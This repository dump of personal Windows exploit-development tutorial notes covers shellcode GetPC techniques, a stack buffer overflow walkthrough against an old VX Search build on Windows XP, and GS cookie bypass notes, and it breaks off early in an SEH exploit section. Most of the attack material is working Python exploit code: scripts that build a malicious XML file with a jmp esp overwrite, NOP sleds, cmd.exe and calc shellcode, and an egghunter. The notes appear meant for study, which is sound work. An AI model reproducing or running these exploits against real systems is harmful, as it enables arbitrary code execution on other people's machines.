24 | * [Learning V8](BrowserSecurity/V8.md)
25 | 
26 | 
27 | ### Windows Exploit Development
28 | * [[20190228][Part0: HackNotes]](WindowsExploitDevelopment/Part0-HackNotes.md)
29 | * [[20190212][Part1: StackOverflow]](WindowsExploitDevelopment/Part1-StackOverflow.md)
30 | * [[20190214][Part2: SEHExploit]](WindowsExploitDevelopment/Part2-SEHExploit.md)
31 | * [[20190217][Part3: BypassDEPwithROP]](WindowsExploitDevelopment/Part3-BypassDEPwithROP.md)
32 | * [[20190221][Part4: From0x00410041toCalc]](WindowsExploitDevelopment/Part4-From0x00410041toCalc.md)
33 | 


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part0-HackNotes.md:
--------------------------------------------------------------------------------
 1 | # Part0: HackNotes
 2 | 
 3 | ** Just some reading notes when reading other people's stuff. **
 4 | 
 5 | ## [Introduction to Win32 shellcoding](https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/)
 6 | 
 7 | 1. Shellcode exitfunc
 8 | ```
 9 | 3 techniques that can be used to exit the shellcode with :
10 | process : this will use ExitProcess()
11 | seh : this one will force an exception call.�� Keep in mind that this one might trigger the exploit code to run over and over again (if the original bug was SEH based for example)
12 | thread : this will use ExitThread()
13 | ```
14 | 
15 | 2. Find yourself : Get Program Counter
16 | Normaly, payload decoder needs to get the absolute base address at first. That's called "Get PC".
17 | 
18 | - CALL $+5  (contain null bytes)
19 | ```
20 | CALL $+5  # e800000000
21 | POP EAX   # 58
22 | ```
23 | 
24 | - CALL label + pop  (contain null bytes)
25 |  ```
26 |  CALL geteip
27 |  geteip:
28 |  pop eax
29 |  ```
30 | 
31 | - CALL $+4 (no null bytes)
32 | 
33 | ```
34 | CALL $+4 #\xe8\xff\xff\xff\xff
35 | RET      #\xc3
36 | POP ECX  #\x59
37 | ```
38 | 
39 | 
40 | - FSTENV (no null bytes)
41 | 
42 | Execute any FPU (Floating Point) instruction at the top of the code, then execute "FSTENV PTR SS: [ESP-C]"
43 | 
44 | the FSTENV will store that state of the floating point chip which includes the address of that first instruction.
45 | 
46 | ```
47 | [BITS 32]
48 | FLDPI
49 | FSTENV [ESP-0xC]
50 | POP EBX
51 | ```
52 | 
53 | 
54 | - Backward call(no null bytes)
55 | ```
56 | [BITS 32]
57 | jmp short corelan
58 | geteip:
59 |   pop esi
60 |   call esi      ;this will jump to decoder
61 | corelan:
62 |   call geteip
63 |   decoder:      
64 |     ; decoder goes here
65 | 
66 |   shellcode:
67 |     ; encoded shellcode goes here
68 | ```
69 | 
70 | 


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow.md:
--------------------------------------------------------------------------------
  1 | # Part1: Stack Overflow
  2 | 
  3 | ## Getting things setup
  4 | 1. windows XP sp3 32-bit
  5 | 2. [vulnerable software-vxsrchc.exe](https://www.exploit-db.com/apps/746ec728a4cf975be799c7f509db383e-vxsearchent_setup_v9.7.18.exe)
  6 | 
  7 | When import a crafted XML file, it would cause a stack overflow and code execution.
  8 | ![](Part1-StackOverflow/Part1-StackOverflow0.png)
  9 | 
 10 | ## Crash 
 11 | ```
 12 | > python -c "print 'A'*2000"
 13 | ```
 14 | ```
 15 | <?xml version="1.0" encoding="UTF-8"?>
 16 | <classify
 17 | name='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'/>
 18 | </classify>
 19 | ```
 20 | 
 21 | 
 22 | Look, EIP got overwritten
 23 | ![](Part1-StackOverflow/Part1-StackOverflow1.png)
 24 | 
 25 | ## Identify offset
 26 | 
 27 | ```
 28 | 0:002> !py mona pattern_create 2000
 29 | 0:000> !py mona pattern_offset 42327a42
 30 | Hold on...
 31 | [+] Command used:
 32 | !py mona.py pattern_offset 42327a42
 33 | Looking for Bz2B in pattern of 500000 bytes
 34 |  - Pattern Bz2B (0x42327a42) found in cyclic pattern at position 1536
 35 | 0:000> !py mona findmsp
 36 | ```
 37 | 
 38 | 
 39 | ```
 40 | <?xml version="1.0" encoding="UTF-8"?>
 41 | <classify
 42 | name='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
 43 | '/>
 44 | </classify>
 45 | ```
 46 | 
 47 | ![](Part1-StackOverflow/Part1-StackOverflow2.png)
 48 | 
 49 | In this case, the shellcode is on the stack, the next step is jumping to stack. Let's find a pointer to jump esp.
 50 | 
 51 | 
 52 | 
 53 | ## Jump to ESP, pop calc
 54 | ```
 55 | 0:000> !py mona jmp -r esp
 56 | ```
 57 | 
 58 | I pick this one
 59 | ![](Part1-StackOverflow/Part1-StackOverflow3.png)
 60 | 
 61 | ```
 62 | import struct
 63 |  
 64 | BUF_SIZE = 2000                         # Set a consistent total buffer size
 65 |  
 66 | junk = "\x41"*1536                       # 997 bytes to hit EIP
 67 | eip = struct.pack("<L", 0x7c874413)     # Use little-endian to format address 0x7c836a78 # jmp esp # kernel32.dll
 68 | nops= "\x90"*16
 69 | 
 70 | # calc.exe shellcode for WinXP SP3 on stack
 71 | shellcode = "\x31\xC9"                  # xor ecx,ecx
 72 | shellcode += "\x51"                     # push ecx
 73 | shellcode += "\x68\x63\x61\x6C\x63"     # push 0x636c6163
 74 | shellcode += "\x54"                     # push dword ptr esp
 75 | shellcode += "\xB8\xC7\x93\xC2\x77"     # mov eax,0x77c293c7
 76 | shellcode += "\xFF\xD0"                 # call eax
 77 |  
 78 | exploit = junk + eip + nops + shellcode # Combine our exploit with a NOP sled and working shellcode
 79 | fill = "\x43"*(BUF_SIZE-len(exploit))   # Calculate number of filler bytes to use (C)
 80 | buf = exploit + fill                    # Combine everything together for exploitation
 81 | xml_payload = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf + '\'/>\n</classify>'
 82 |  
 83 | try:
 84 |     f = open(r"C:\Documents and Settings\Administrator\Desktop\payload.xml", "wb") # Exploit output will be written to C directory
 85 |     f.write(xml_payload)                        # Write entirety of buffer out to file
 86 |     f.close()                           # Close file
 87 |     print "\nNScan 0.9.1 Saved Return Pointer Overwrite Exploit"
 88 |     print "\nExploit written successfully!"
 89 |     print "Buffer size: " + str(len(xml_payload)) + "\n" # Buffer size sanity check to ensure there's nothing funny going on
 90 | except Exception, e:
 91 |     print "\nError! Exploit could not be generated, error details follow:\n"
 92 |     print str(e) + "\n"  
 93 | ```
 94 | 
 95 | Here we go
 96 | ![](Part1-StackOverflow/Part1-StackOverflow4.png)
 97 | 
 98 | But let's take a look at stack memory, em, there are unexpected instructions!
 99 | 
100 | If our shellcode size is more than 16 bytes, it will exploit fail.
101 | 
102 | ![](Part1-StackOverflow/Part1-StackOverflow5.png)
103 | 
104 | So, we need to jump to these unexpected instructions.
105 | 
106 | ## Jump to local shellcode
107 | 
108 | Now, we use another [shellcode](http://shell-storm.org/shellcode/files/shellcode-662.php) which size is bigger.
109 | 
110 | If we can take 0x14 bytes forward, we could skip the unexpected instructions.
111 | 
112 | It seems mona creates incorrect "jmp 14" opcode, so I found this: [SHORT Relative Jumps on X86](https://thestarman.pcministry.com/asm/2bytejumps.htm)
113 | 
114 | ```
115 | import struct
116 |  
117 | BUF_SIZE = 2000                         # Set a consistent total buffer size
118 |  
119 | junk = "\x41"*1536                       # 1536 bytes to hit EIP
120 | eip = struct.pack("<L", 0x7c874413)     # Use little-endian to format address 0x7c836a78 # jmp esp # kernel32.dll
121 | nops= "\x90"*16
122 | 
123 | jmp = "\xeb\x14"
124 | nops2 = "\x90"*16 + "\x90"*16            # 16 byte NOPs to get to jump landing + 16 byte NOPs to slide into shell
125 | 
126 | # Command prompt (cmd.exe) shellcode + process exit (195 bytes)
127 | shellcode =  "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
128 | shellcode +=  "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
129 | shellcode +=  "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
130 | shellcode +=  "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
131 | shellcode +=  "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
132 | shellcode +=  "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
133 | shellcode +=  "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
134 | shellcode +=  "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
135 | shellcode +=  "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
136 | shellcode +=  "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
137 | shellcode +=  "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
138 | shellcode +=  "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
139 | shellcode +=  "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
140 | shellcode +=  "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
141 | shellcode +=  "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
142 | shellcode +=  "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
143 | shellcode +=  "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
144 | shellcode +=  "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
145 | shellcode +=  "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
146 | shellcode +=  "\x24\x20\x57\xFF\xD0"
147 |  
148 | exploit = junk + eip + nops + jmp + nops2 + shellcode # Combine our exploit with a NOP sled and working shellcode
149 | fill = "\x43"*(BUF_SIZE-len(exploit))   # Calculate number of filler bytes to use (C)
150 | buf = exploit + fill                    # Combine everything together for exploitation
151 | xml_payload = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf + '\'/>\n</classify>'
152 |  
153 | try:
154 |     f = open(r"C:\Documents and Settings\Administrator\Desktop\payload.xml", "wb") # Exploit output will be written to C directory
155 |     f.write(xml_payload)                        # Write entirety of buffer out to file
156 |     f.close()                           # Close file
157 |     print "\nNScan 0.9.1 Saved Return Pointer Overwrite Exploit"
158 |     print "\nExploit written successfully!"
159 |     print "Buffer size: " + str(len(xml_payload)) + "\n" # Buffer size sanity check to ensure there's nothing funny going on
160 | except Exception, e:
161 |     print "\nError! Exploit could not be generated, error details follow:\n"
162 |     print str(e) + "\n" 
163 | ```
164 | 
165 | ![](Part1-StackOverflow/Part1-StackOverflow6.png)
166 | 
167 | 
168 | ## Egg Hunter
169 | 
170 | In the above series, the size of the available memory on the stack is big enough to fit our entire shellcode. What if the buffer size is too small? Here is a technique called egg hunting. It allows you to use a small shellcode to search the actual big shellcode in the memory and jump to execute it.
171 | 
172 | ```
173 | 0:000> !py mona egg
174 | ```
175 | 
176 | ![](Part1-StackOverflow/Part1-StackOverflow7.png)
177 | 
178 | ```
179 | import struct
180 |  
181 | BUF_SIZE = 2000                         # Set a consistent total buffer size
182 |  
183 | junk = "\x41"*1536                       # 1536 bytes to hit EIP
184 | eip = struct.pack("<L", 0x7c874413)     # Use little-endian to format address 0x7c836a78 # jmp esp # kernel32.dll
185 | nops= "\x90"*16
186 | 
187 | jmp = "\xeb\x14"
188 | nops2 = "\x90"*24            # 24 byte NOPs to get to jump landing 
189 | 
190 | 
191 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
192 | egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff"
193 | egghunter += "\xe7"
194 | 
195 | egg = "w00tw00t"
196 | nops3 = "\x90"*16           #16 byte NOPs to slide into shell
197 | 
198 | # Command prompt (cmd.exe) shellcode + process exit (195 bytes)
199 | shellcode =  "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
200 | shellcode +=  "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
201 | shellcode +=  "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
202 | shellcode +=  "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
203 | shellcode +=  "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
204 | shellcode +=  "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
205 | shellcode +=  "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
206 | shellcode +=  "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
207 | shellcode +=  "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
208 | shellcode +=  "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
209 | shellcode +=  "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
210 | shellcode +=  "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
211 | shellcode +=  "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
212 | shellcode +=  "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
213 | shellcode +=  "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
214 | shellcode +=  "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
215 | shellcode +=  "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
216 | shellcode +=  "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
217 | shellcode +=  "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
218 | shellcode +=  "\x24\x20\x57\xFF\xD0"
219 |  
220 | exploit = junk + eip + nops + jmp + nops2 + egghunter + egg + nops3 + shellcode # Combine our exploit with a NOP sled and working shellcode
221 | fill = "\x43"*(BUF_SIZE-len(exploit))   # Calculate number of filler bytes to use (C)
222 | buf = exploit + fill                    # Combine everything together for exploitation
223 | xml_payload = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf + '\'/>\n</classify>'
224 |  
225 | try:
226 |     f = open(r"C:\Documents and Settings\Administrator\Desktop\payload.xml", "wb") # Exploit output will be written to C directory
227 |     f.write(xml_payload)                        # Write entirety of buffer out to file
228 |     f.close()                           # Close file
229 |     print "\nNScan 0.9.1 Saved Return Pointer Overwrite Exploit"
230 |     print "\nExploit written successfully!"
231 |     print "Buffer size: " + str(len(xml_payload)) + "\n" # Buffer size sanity check to ensure there's nothing funny going on
232 | except Exception, e:
233 |     print "\nError! Exploit could not be generated, error details follow:\n"
234 |     print str(e) + "\n" 
235 | ```
236 | 
237 | ![](Part1-StackOverflow/Part1-StackOverflow9.png)
238 | 
239 | Exploit Success!
240 | 
241 | ![](Part1-StackOverflow/Part1-StackOverflow8.png)
242 | 
243 | ## Stack cookie /GS bypass methods
244 | 
245 | ** Some reading notes from [corelan's awesome paper](https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/) **
246 | 
247 | 1. Bypass using Exception Handling
248 | ```
249 | [buffer][cookie][EH record][saved ebp][saved eip][arguments ]
250 | 
251 | overwrite - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >
252 | ```
253 | 2. Bypass by overwriting stack data in functions up the stack
254 | 
255 | When pointers to objects or structures are passed to functions, and these objects or structures resided on the stack of their callers (parent function), then this could lead to GS cookie bypass. (overwrite object and vtable pointer. If you point this pointer to a fake vtable, you can redirect the virtual function call and execute your evil code)
256 | 
257 | ```
258 | #include "stdafx.h"
259 | #include "windows.h"
260 | class Foo {
261 | public:
262 |     void __declspec(noinline) gs3(char* src)
263 |     {
264 |         char buf[8];
265 |         strcpy(buf, src);
266 |         printf("%c", buf[1]);
267 | 
268 |         bar(); // virtual function call
269 |     }
270 |     virtual void __declspec(noinline) bar()
271 |     {
272 |     }
273 | };
274 | int main()
275 | {
276 |     Foo foo;
277 |     char s1[29] = "AAAABBBBCCCCDDDDEEEEFFFFGGGG";
278 |     foo.gs3(s1);
279 |     return 0;
280 | }
281 | ```
282 | 
283 | ```
284 | before overwrite:
285 | 00effc48 00effc50 
286 | 00effc4c 01242124 ConsoleApplication1!Foo::`vftable'
287 | 
288 | after overwrite:
289 | 00effc48 46464646 
290 | 00effc4c 47474747 ConsoleApplication1!`string'
291 | ```
292 | 
293 | ## Ref
294 | 1. http://www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
295 | 2. http://www.shogunlab.com/blog/2017/08/26/zdzg-windows-exploit-2.html
296 | 3. http://www.shogunlab.com/blog/2017/09/02/zdzg-windows-exploit-3.html
297 | 4. https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
298 | 


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow0.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow1.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow2.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow3.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow4.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow5.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow6.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow7.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow8.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part1-StackOverflow/Part1-StackOverflow9.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part2-SEHExploit.md:
--------------------------------------------------------------------------------
  1 | #Part2: SEHExploit
  2 | 
  3 | ## Getting things setup
  4 | 1. windows XP sp3 32-bit
  5 | 2. [vulnerable software](https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe)
  6 | 
  7 | this vulnerability is a GET HTTP Request Buffer Overflow and could lead to remote code execution. That means it could be exploited from a remote location.
  8 | 
  9 | ## Structured Exception Handling(SEH)
 10 | 
 11 | Windows SEH Chain, from [securitysift](http://www.securitysift.com/wp-content/uploads/2014/03/win_exploit_6_1-1.png)
 12 | 
 13 | ![](Part2-SEHExploit/Part2-SEHExploit0.png)
 14 | 
 15 | Every thread has its own SEH chain, SEH Chain is formed by a chain of Exception Registration Record which structure like this
 16 | ```
